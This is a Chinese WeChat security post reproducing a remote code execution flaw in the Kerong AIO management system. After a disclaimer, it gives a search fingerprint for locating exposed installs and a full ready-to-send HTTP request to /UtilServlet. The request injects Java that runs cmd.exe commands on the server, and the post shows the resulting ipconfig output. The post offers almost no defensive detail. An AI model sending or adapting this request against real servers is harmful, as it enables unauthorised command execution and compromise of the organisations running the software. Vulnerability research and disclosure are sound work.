声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
公众号现在只对常读和星标的公众号才展示大图推送,建议把公众号设为星标,否则可能就看不到啦!感谢各位师傅。
漏洞描述
科荣AIO管理系统存在命令执行漏洞,攻击者可以通过构造恶意请求,进行远程代码执行。可导致服务器失陷,为确保系统安全,建议尽快修复漏洞。
资产收集
body="changeAccount('8000')"
漏洞复现
构造请求包
POST /UtilServlet HTTP/1.1Host:Content-Length: 43Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+ipconfig").getInputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field
返回包
HTTP/1.1 200 OKServer: Apache-Coyote/1.1Set-Cookie: JSESSIONID=5012DE2402DCCFF74CA3D05FE6D800F6; Path=/; HttpOnlyContent-Type: text/html; charset=utf-8Vary: Accept-EncodingDate: Wed, 17 Jan 2024 02:52:47 GMTContent-Length: 502Windows IP 配置以太网适配器 本地连接: 连接特定的 DNS 后缀 . . . . . . . : 本地链接 IPv6 地址. . . . . . . . : IPv4 地址 . . . . . . . . . . . . : 子网掩码 . . . . . . . . . . . . : 255.255.255.0 默认网关. . . . . . . . . . . . . : 隧道适配器 : 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . :
原文始发于微信公众号(Devil安全):【漏洞复现】科荣 AIO 管理系统存在远程代码执行漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论